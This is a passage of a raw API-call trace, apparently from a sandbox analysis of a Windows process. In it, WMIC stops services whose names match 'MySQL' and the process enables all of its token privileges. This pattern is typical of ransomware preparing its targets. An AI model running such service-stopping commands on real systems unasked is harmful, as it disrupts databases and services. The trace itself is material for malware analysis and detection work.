(_Size=0x18) returned 0x412d60 [0287.832] free (_Block=0x0) [0287.832] free (_Block=0x412d40) [0287.832] malloc (_Size=0x18) returned 0x412a40 [0287.832] lstrlenW (lpString="QUIT") returned 4 [0287.832] lstrlenW (lpString="path") returned 4 [0287.833] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="QUIT", cchCount2=4) returned 1 [0287.833] lstrlenW (lpString="EXIT") returned 4 [0287.833] lstrlenW (lpString="path") returned 4 [0287.833] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="EXIT", cchCount2=4) returned 3 [0287.833] free (_Block=0x412a40) [0287.833] WbemLocator:IUnknown:AddRef (This=0x7a47f8) returned 0x2 [0287.833] malloc (_Size=0x18) returned 0x412a40 [0287.833] lstrlenW (lpString="/") returned 1 [0287.833] lstrlenW (lpString="path") returned 4 [0287.833] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0287.833] lstrlenW (lpString="-") returned 1 [0287.833] lstrlenW (lpString="path") returned 4 [0287.833] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0287.833] lstrlenW (lpString="CLASS") returned 5 [0287.833] lstrlenW (lpString="path") returned 4 [0287.833] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="CLASS", cchCount2=5) returned 3 [0287.833] lstrlenW (lpString="PATH") returned 4 [0287.833] lstrlenW (lpString="path") returned 4 [0287.833] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="PATH", cchCount2=4) returned 2 [0287.833] lstrlenW (lpString="/") returned 1 [0287.833] lstrlenW (lpString="Win32_Service") returned 13 [0287.833] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="/", cchCount2=1) returned 3 [0287.834] lstrlenW (lpString="-") returned 1 [0287.834] lstrlenW (lpString="Win32_Service") returned 13 [0287.834] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="-", cchCount2=1) returned 3 [0287.834] lstrlenW (lpString="Win32_Service") returned 13 [0287.834] malloc (_Size=0x1c) returned 0x419da8 [0287.834] lstrlenW (lpString="Win32_Service") returned 13 [0287.834] wcstok (in: _String="Win32_Service", _Delimiter=".", _Context=0x1355bd7b | out: _String="Win32_Service", _Context=0x1355bd7b) returned="Win32_Service" [0287.834] lstrlenW (lpString="Win32_Service") returned 13 [0287.834] malloc (_Size=0x1c) returned 0x41c0e0 [0287.834] lstrlenW (lpString="Win32_Service") returned 13 [0287.834] wcstok (in: _String=0x0, _Delimiter=",", _Context=0x1355bd7b | out: _String=0x0, _Context=0x1355bd7b) returned 0x0 [0287.834] lstrlenW (lpString="") returned 0 [0287.834] lstrlenW (lpString="WHERE") returned 5 [0287.834] lstrlenW (lpString="where") returned 5 [0287.834] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0287.834] lstrlenW (lpString="/") returned 1 [0287.834] lstrlenW (lpString="name like '%%MySQL%%'") returned 21 [0287.834] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%MySQL%%'", cchCount1=21, lpString2="/", cchCount2=1) returned 3 [0287.834] lstrlenW (lpString="-") returned 1 [0287.834] lstrlenW (lpString="name like '%%MySQL%%'") returned 21 [0287.834] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%MySQL%%'", cchCount1=21, lpString2="-", cchCount2=1) returned 3 [0287.834] lstrlenW (lpString="name like '%%MySQL%%'") returned 21 [0287.835] malloc (_Size=0x2c) returned 0x41c150 [0287.835] lstrlenW (lpString="name like '%%MySQL%%'") returned 21 [0287.835] lstrlenW (lpString="/") returned 1 [0287.835] lstrlenW (lpString="call") returned 4 [0287.835] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0287.835] lstrlenW (lpString="-") returned 1 [0287.835] lstrlenW (lpString="call") returned 4 [0287.835] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0287.835] lstrlenW (lpString="call") returned 4 [0287.835] malloc (_Size=0xa) returned 0x41adc8 [0287.835] lstrlenW (lpString="call") returned 4 [0287.835] lstrlenW (lpString="GET") returned 3 [0287.835] lstrlenW (lpString="call") returned 4 [0287.835] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0287.835] lstrlenW (lpString="LIST") returned 4 [0287.835] lstrlenW (lpString="call") returned 4 [0287.835] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0287.835] lstrlenW (lpString="SET") returned 3 [0287.835] lstrlenW (lpString="call") returned 4 [0287.835] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0287.835] lstrlenW (lpString="CREATE") returned 6 [0287.835] lstrlenW (lpString="call") returned 4 [0287.835] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0287.835] lstrlenW (lpString="CALL") returned 4 [0287.835] lstrlenW (lpString="call") returned 4 [0287.835] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0287.835] lstrlenW (lpString="/") returned 1 [0287.835] lstrlenW (lpString="stopservice") returned 11 [0287.836] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="/", cchCount2=1) returned 3 [0287.836] lstrlenW (lpString="-") returned 1 [0287.836] lstrlenW (lpString="stopservice") returned 11 [0287.836] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="-", cchCount2=1) returned 3 [0287.836] lstrlenW (lpString="stopservice") returned 11 [0287.836] malloc (_Size=0x18) returned 0x412d40 [0287.836] lstrlenW (lpString="stopservice") returned 11 [0287.836] ??0CHString@@QAE@XZ () returned 0x4bd85c [0287.836] GetCurrentThreadId () returned 0x11d8 [0287.836] GetCurrentThreadId () returned 0x11d8 [0287.836] ??0CHString@@QAE@XZ () returned 0x4bd7e4 [0287.836] malloc (_Size=0x4) returned 0x41c108 [0287.836] malloc (_Size=0xc) returned 0x41aca8 [0287.836] malloc (_Size=0xc) returned 0x41ac30 [0287.836] WbemLocator:IWbemLocator:ConnectServer (in: This=0x7a47f8, strNetworkResource="root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xa68518 | out: ppNamespace=0xa68518*=0x7aabc8) returned 0x0 [0287.896] free (_Block=0x41ac30) [0287.896] CoSetProxyBlanket (pProxy=0x7aabc8, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0287.896] free (_Block=0x41c108) [0287.896] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0287.896] free (_Block=0x41aca8) [0287.896] malloc (_Size=0xc) returned 0x41ac30 [0287.896] IWbemServices:GetObject (in: This=0x7aabc8, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x4bd874*=0x0, ppCallResult=0x0 | out: ppObject=0x4bd874*=0x800300, ppCallResult=0x0) returned 0x0 [0287.981] free (_Block=0x41ac30) [0287.981] IWbemClassObject:BeginMethodEnumeration (This=0x800300, lEnumFlags=0) returned 0x0 [0287.981] IWbemClassObject:NextMethod (in: This=0x800300, lFlags=0, pstrName=0x4bd880*=0x0, ppInSignature=0x4bd87c*=0x0, ppOutSignature=0x4bd878*=0x0 | out: pstrName=0x4bd880*="StartService", ppInSignature=0x4bd87c*=0x0, ppOutSignature=0x4bd878*=0x8004f8) returned 0x0 [0287.981] lstrlenW (lpString="StartService") returned 12 [0287.981] lstrlenW (lpString="stopservice") returned 11 [0287.981] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StartService", cchCount2=12) returned 3 [0287.981] IUnknown:Release (This=0x8004f8) returned 0x0 [0287.981] IWbemClassObject:NextMethod (in: This=0x800300, lFlags=0, pstrName=0x4bd880*=0x0, ppInSignature=0x4bd87c*=0x0, ppOutSignature=0x4bd878*=0x0 | out: pstrName=0x4bd880*="StopService", ppInSignature=0x4bd87c*=0x0, ppOutSignature=0x4bd878*=0x8004f8) returned 0x0 [0287.981] lstrlenW (lpString="StopService") returned 11 [0287.981] lstrlenW (lpString="stopservice") returned 11 [0287.981] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StopService", cchCount2=11) returned 2 [0287.982] malloc (_Size=0x38) returned 0x41c8f8 [0287.982] ??0CHString@@QAE@XZ () returned 0x4bd3c4 [0287.982] GetCurrentThreadId () returned 0x11d8 [0287.982] IWbemClassObject:GetNames (in: This=0x8004f8, wszQualifierName=0x0, lFlags=64, pQualifierVal=0x0, pNames=0x4bd3d4 | out: pNames=0x4bd3d4*="\x01ƀ\x04") returned 0x0 [0287.983] SafeArrayGetLBound (in: psa=0x8009a0, nDim=0x1, plLbound=0x4bd3c0 | out: plLbound=0x4bd3c0) returned 0x0 [0287.983] SafeArrayGetUBound (in: psa=0x8009a0, nDim=0x1, plUbound=0x4bd3bc | out: plUbound=0x4bd3bc) returned 0x0 [0287.983] SafeArrayGetElement (in: psa=0x8009a0, rgIndices=0x4bd3c8, pv=0x4bd3d8 | out: pv=0x4bd3d8) returned 0x0 [0287.983] malloc (_Size=0x24) returned 0x41c938 [0287.983] IWbemClassObject:GetPropertyQualifierSet (in: This=0x8004f8, wszProperty="ReturnValue", ppQualSet=0x4bd2e8 | out: ppQualSet=0x4bd2e8*=0x7aaae8) returned 0x0 [0287.983] malloc (_Size=0xc) returned 0x41ac30 [0287.983] IWbemQualifierSet:Get (in: This=0x7aaae8, wszName="CIMTYPE", lFlags=0, pVal=0x4bd2b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x4bd2b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="uint32", varVal2=0x0), plFlavor=0x0) returned 0x0 [0287.983] free (_Block=0x41ac30) [0287.983] malloc (_Size=0xc) returned 0x41ade0 [0287.984] IWbemClassObject:Get (in: This=0x8004f8, wszName="ReturnValue", lFlags=0, pVal=0x4bd290*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x4bd2cc*=4969140, plFlavor=0x0 | out: pVal=0x4bd290*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x4bd2cc*=19, plFlavor=0x0) returned 0x0 [0287.984] malloc (_Size=0xc) returned 0x41ac30 [0287.984] IWbemQualifierSet:Get (in: This=0x7aaae8, wszName="read", lFlags=0, pVal=0x4bd2d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x4bd2d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0287.984] free (_Block=0x41ac30) [0287.984] malloc (_Size=0xc) returned 0x41aca8 [0287.984] IWbemQualifierSet:Get (in: This=0x7aaae8, wszName="write", lFlags=0, pVal=0x4bd2d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x4bd2d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0287.984] free (_Block=0x41aca8) [0287.984] malloc (_Size=0xc) returned 0x41ac30 [0287.984] malloc (_Size=0xc) returned 0x41adf8 [0287.984] IWbemQualifierSet:Get (in: This=0x7aaae8, wszName="Description", lFlags=0, pVal=0x4bd2a8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x4bd2a8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0287.984] free (_Block=0x41adf8) [0287.984] malloc (_Size=0xc) returned 0x41aca8 [0287.985] lstrlenA (lpString="Not Available") returned 13 [0287.991] malloc (_Size=0x1c) returned 0x41c968 [0287.991] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa21d94, cbMultiByte=-1, lpWideCharStr=0x41c968, cchWideChar=14 | out: lpWideCharStr="Not Available") returned 14 [0287.991] free (_Block=0x41c968) [0287.991] IUnknown:Release (This=0x7aaae8) returned 0x0 [0287.991] malloc (_Size=0x24) returned 0x41c968 [0287.991] malloc (_Size=0xc) returned 0x41acc0 [0287.991] malloc (_Size=0x24) returned 0x41c998 [0287.991] malloc (_Size=0x38) returned 0x41c9c8 [0287.991] malloc (_Size=0x24) returned 0x41ca08 [0287.991] free (_Block=0x41c998) [0287.991] free (_Block=0x41c968) [0287.991] free (_Block=0x41c938) [0287.991] free (_Block=0x41ac30) [0287.991] free (_Block=0x41aca8) [0287.991] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0287.992] IWbemClassObject:GetMethodQualifierSet (in: This=0x800300, wszMethod="StopService", ppQualSet=0x4bd7dc | out: ppQualSet=0x4bd7dc*=0x7d5030) returned 0x0 [0287.992] malloc (_Size=0xc) returned 0x41acd8 [0287.992] IWbemQualifierSet:Get (in: This=0x7d5030, wszName="Implemented", lFlags=0, pVal=0x4bd7c4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x4bd7c4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0287.992] free (_Block=0x41acd8) [0287.992] malloc (_Size=0xc) returned 0x41aca8 [0287.992] malloc (_Size=0xc) returned 0x41acd8 [0287.992] IWbemQualifierSet:Get (in: This=0x7d5030, wszName="Description", lFlags=0, pVal=0x4bd7b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x4bd7b4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The StopService method places the service in the stopped state. It returns an integer value of 0 if the service was successfully stopped, 1 if the request is not supported, and any other number to indicate an error. It returns one of the following integer values:\n0 - The request was accepted.\n1 - The request is not supported.\n2 - The user did not have the necessary access.\n3 - The service cannot be stopped because other services that are running are dependent on it.\n4 - The requested control code is not valid, or it is unacceptable to the service.\n5 - The requested control code cannot be sent to the service because the state of the service (Win32_BaseService:State) is equal to 0, 1, or 2.\n6 - The service has not been started.\n7 - The service did not respond to the start request in a timely fashion.\n8 - Unknown failure when starting the service.\n9 - The directory path to the service executable was not found.\n10 - The service is already running.\n11 - The database to add a new service is locked.\n12 - A dependency for which this service relies on has been removed from the system.\n13 - The service failed to find the service needed from a dependent service.\n14 - The service has been disabled from the system.\n15 - The service does not have the correct authentication to run on the system.\n16 - This service is being removed from the system.\n17 - There is no execution thread for the service.\n18 - There are circular dependencies when starting the service.\n19 - There is a service running under the same name.\n20 - There are invalid characters in the name of the service.\n21 - Invalid parameters have been passed to the service.\n22 - The account, which this service is to run under is either invalid or lacks the permissions to run the service.\n23 - The service exists in the database of services available from the system.\n24 - The service is currently paused in the system.\nOther - For integer values other than those listed above, refer to Win32 error code documentation.", varVal2=0x0), plFlavor=0x0) returned 0x0 [0287.993] free (_Block=0x41acd8) [0287.993] malloc (_Size=0xc) returned 0x41acd8 [0287.993] IUnknown:Release (This=0x7d5030) returned 0x0 [0287.993] malloc (_Size=0x38) returned 0x41c938 [0287.993] malloc (_Size=0x38) returned 0x41c978 [0287.993] malloc (_Size=0x24) returned 0x41ca38 [0287.993] malloc (_Size=0xc) returned 0x41ac30 [0287.994] malloc (_Size=0x38) returned 0x41ca68 [0287.994] malloc (_Size=0x38) returned 0x41caa8 [0287.994] malloc (_Size=0x24) returned 0x41cae8 [0287.994] malloc (_Size=0x28) returned 0x41cb18 [0287.994] malloc (_Size=0x38) returned 0x41cb48 [0287.994] malloc (_Size=0x38) returned 0x41cb88 [0287.994] malloc (_Size=0x24) returned 0x41cbc8 [0287.994] free (_Block=0x41cae8) [0287.994] free (_Block=0x41caa8) [0287.994] free (_Block=0x41ca68) [0287.994] free (_Block=0x41ca38) [0287.994] free (_Block=0x41c978) [0287.994] free (_Block=0x41c938) [0287.994] IUnknown:Release (This=0x8004f8) returned 0x0 [0287.994] free (_Block=0x41ca08) [0287.994] free (_Block=0x41c9c8) [0287.994] free (_Block=0x41c8f8) [0287.994] IWbemClassObject:NextMethod (in: This=0x800300, lFlags=0, pstrName=0x4bd880*=0x0, ppInSignature=0x4bd87c*=0x0, ppOutSignature=0x4bd878*=0x0 | out: pstrName=0x4bd880*="PauseService", ppInSignature=0x4bd87c*=0x0, ppOutSignature=0x4bd878*=0x8004f8) returned 0x0 [0287.994] lstrlenW (lpString="PauseService") returned 12 [0287.994] lstrlenW (lpString="stopservice") returned 11 [0287.994] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="PauseService", cchCount2=12) returned 3 [0287.995] IUnknown:Release (This=0x8004f8) returned 0x0 [0287.995] IWbemClassObject:NextMethod (in: This=0x800300, lFlags=0, pstrName=0x4bd880*=0x0, ppInSignature=0x4bd87c*=0x0, ppOutSignature=0x4bd878*=0x0 | out: pstrName=0x4bd880*="ResumeService", ppInSignature=0x4bd87c*=0x0, ppOutSignature=0x4bd878*=0x8004f8) returned 0x0 [0287.995] lstrlenW (lpString="ResumeService") returned 13 [0287.995] lstrlenW (lpString="stopservice") returned 11 [0287.995] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ResumeService", cchCount2=13) returned 3 [0287.995] IUnknown:Release (This=0x8004f8) returned 0x0 [0287.995] IWbemClassObject:NextMethod (in: This=0x800300, lFlags=0, pstrName=0x4bd880*=0x0, ppInSignature=0x4bd87c*=0x0, ppOutSignature=0x4bd878*=0x0 | out: pstrName=0x4bd880*="InterrogateService", ppInSignature=0x4bd87c*=0x0, ppOutSignature=0x4bd878*=0x8004f8) returned 0x0 [0287.995] lstrlenW (lpString="InterrogateService") returned 18 [0287.995] lstrlenW (lpString="stopservice") returned 11 [0287.995] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="InterrogateService", cchCount2=18) returned 3 [0287.995] IUnknown:Release (This=0x8004f8) returned 0x0 [0287.995] IWbemClassObject:NextMethod (in: This=0x800300, lFlags=0, pstrName=0x4bd880*=0x0, ppInSignature=0x4bd87c*=0x0, ppOutSignature=0x4bd878*=0x0 | out: pstrName=0x4bd880*="UserControlService", ppInSignature=0x4bd87c*=0x8004f8, ppOutSignature=0x4bd878*=0x802fb0) returned 0x0 [0287.996] lstrlenW (lpString="UserControlService") returned 18 [0287.996] lstrlenW (lpString="stopservice") returned 11 [0287.996] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="UserControlService", cchCount2=18) returned 1 [0287.996] IUnknown:Release (This=0x8004f8) returned 0x0 [0287.996] IUnknown:Release (This=0x802fb0) returned 0x0 [0287.996] IWbemClassObject:NextMethod (in: This=0x800300, lFlags=0, pstrName=0x4bd880*=0x0, ppInSignature=0x4bd87c*=0x0, ppOutSignature=0x4bd878*=0x0 | out: pstrName=0x4bd880*="Create", ppInSignature=0x4bd87c*=0x8004f8, ppOutSignature=0x4bd878*=0x804f80) returned 0x0 [0287.996] lstrlenW (lpString="Create") returned 6 [0287.997] lstrlenW (lpString="stopservice") returned 11 [0287.997] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Create", cchCount2=6) returned 3 [0287.997] IUnknown:Release (This=0x8004f8) returned 0x0 [0287.997] IUnknown:Release (This=0x804f80) returned 0x0 [0287.997] IWbemClassObject:NextMethod (in: This=0x800300, lFlags=0, pstrName=0x4bd880*=0x0, ppInSignature=0x4bd87c*=0x0, ppOutSignature=0x4bd878*=0x0 | out: pstrName=0x4bd880*="Change", ppInSignature=0x4bd87c*=0x8004f8, ppOutSignature=0x4bd878*=0x804d00) returned 0x0 [0287.997] lstrlenW (lpString="Change") returned 6 [0287.997] lstrlenW (lpString="stopservice") returned 11 [0287.997] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Change", cchCount2=6) returned 3 [0287.997] IUnknown:Release (This=0x8004f8) returned 0x0 [0287.997] IUnknown:Release (This=0x804d00) returned 0x0 [0287.997] IWbemClassObject:NextMethod (in: This=0x800300, lFlags=0, pstrName=0x4bd880*=0x0, ppInSignature=0x4bd87c*=0x0, ppOutSignature=0x4bd878*=0x0 | out: pstrName=0x4bd880*="ChangeStartMode", ppInSignature=0x4bd87c*=0x8004f8, ppOutSignature=0x4bd878*=0x803120) returned 0x0 [0287.997] lstrlenW (lpString="ChangeStartMode") returned 15 [0287.997] lstrlenW (lpString="stopservice") returned 11 [0287.997] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ChangeStartMode", cchCount2=15) returned 3 [0287.997] IUnknown:Release (This=0x8004f8) returned 0x0 [0287.997] IUnknown:Release (This=0x803120) returned 0x0 [0287.998] IWbemClassObject:NextMethod (in: This=0x800300, lFlags=0, pstrName=0x4bd880*=0x0, ppInSignature=0x4bd87c*=0x0, ppOutSignature=0x4bd878*=0x0 | out: pstrName=0x4bd880*="Delete", ppInSignature=0x4bd87c*=0x0, ppOutSignature=0x4bd878*=0x7d62b8) returned 0x0 [0287.998] lstrlenW (lpString="Delete") returned 6 [0287.998] lstrlenW (lpString="stopservice") returned 11 [0287.998] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Delete", cchCount2=6) returned 3 [0287.998] IUnknown:Release (This=0x7d62b8) returned 0x0 [0287.998] IWbemClassObject:NextMethod (in: This=0x800300, lFlags=0, pstrName=0x4bd880*=0x0, ppInSignature=0x4bd87c*=0x0, ppOutSignature=0x4bd878*=0x0 | out: pstrName=0x4bd880*="GetSecurityDescriptor", ppInSignature=0x4bd87c*=0x0, ppOutSignature=0x4bd878*=0x8004f8) returned 0x0 [0287.998] lstrlenW (lpString="GetSecurityDescriptor") returned 21 [0287.998] lstrlenW (lpString="stopservice") returned 11 [0287.998] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="GetSecurityDescriptor", cchCount2=21) returned 3 [0287.998] IUnknown:Release (This=0x8004f8) returned 0x0 [0287.998] IWbemClassObject:NextMethod (in: This=0x800300, lFlags=0, pstrName=0x4bd880*=0x0, ppInSignature=0x4bd87c*=0x0, ppOutSignature=0x4bd878*=0x0 | out: pstrName=0x4bd880*="SetSecurityDescriptor", ppInSignature=0x4bd87c*=0x8004f8, ppOutSignature=0x4bd878*=0x802fb0) returned 0x0 [0287.998] lstrlenW (lpString="SetSecurityDescriptor") returned 21 [0287.998] lstrlenW (lpString="stopservice") returned 11 [0287.998] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="SetSecurityDescriptor", cchCount2=21) returned 3 [0287.998] IUnknown:Release (This=0x8004f8) returned 0x0 [0287.998] IUnknown:Release (This=0x802fb0) returned 0x0 [0287.999] IWbemClassObject:NextMethod (in: This=0x800300, lFlags=0, pstrName=0x4bd880*=0x0, ppInSignature=0x4bd87c*=0x0, ppOutSignature=0x4bd878*=0x0 | out: pstrName=0x4bd880*=0x0, ppInSignature=0x4bd87c*=0x0, ppOutSignature=0x4bd878*=0x0) returned 0x40005 [0287.999] IUnknown:Release (This=0x800300) returned 0x0 [0288.000] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0288.000] lstrlenW (lpString="SET") returned 3 [0288.001] lstrlenW (lpString="call") returned 4 [0288.001] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0288.001] lstrlenW (lpString="CREATE") returned 6 [0288.001] lstrlenW (lpString="call") returned 4 [0288.001] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0288.001] free (_Block=0x412a40) [0288.001] malloc (_Size=0x4) returned 0x41c108 [0288.001] lstrlenW (lpString="GET") returned 3 [0288.001] lstrlenW (lpString="call") returned 4 [0288.001] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0288.001] lstrlenW (lpString="LIST") returned 4 [0288.001] lstrlenW (lpString="call") returned 4 [0288.001] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0288.001] lstrlenW (lpString="ASSOC") returned 5 [0288.001] lstrlenW (lpString="call") returned 4 [0288.001] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0288.001] WbemLocator:IUnknown:AddRef (This=0x7a47f8) returned 0x3 [0288.001] free (_Block=0x412788) [0288.001] lstrlenW (lpString="") returned 0 [0288.001] lstrlenW (lpString="NQDPDE") returned 6 [0288.002] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0288.002] lstrlenW (lpString="NQDPDE") returned 6 [0288.002] malloc (_Size=0xe) returned 0x41adf8 [0288.002] lstrlenW (lpString="NQDPDE") returned 6 [0288.002] GetCurrentThreadId () returned 0x11d8 [0288.002] GetCurrentProcess () returned 0xffffffff [0288.002] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x4bf958 | out: TokenHandle=0x4bf958*=0x2f8) returned 1 [0288.002] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bf954 | out: TokenInformation=0x0, ReturnLength=0x4bf954) returned 0 [0288.002] malloc (_Size=0x118) returned 0x41c8f8 [0288.002] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x3, TokenInformation=0x41c8f8, TokenInformationLength=0x118, ReturnLength=0x4bf954 | out: TokenInformation=0x41c8f8, ReturnLength=0x4bf954) returned 1 [0288.002] AdjustTokenPrivileges (in: TokenHandle=0x2f8, DisableAllPrivileges=0, NewState=0x41c8f8*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0288.002] free (_Block=0x41c8f8) [0288.002] CloseHandle (hObject=0x2f8) returned 1 [0288.002] lstrlenW (lpString="GET") returned 3 [0288.002] lstrlenW (lpString="call") returned 4 [0288.002] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", 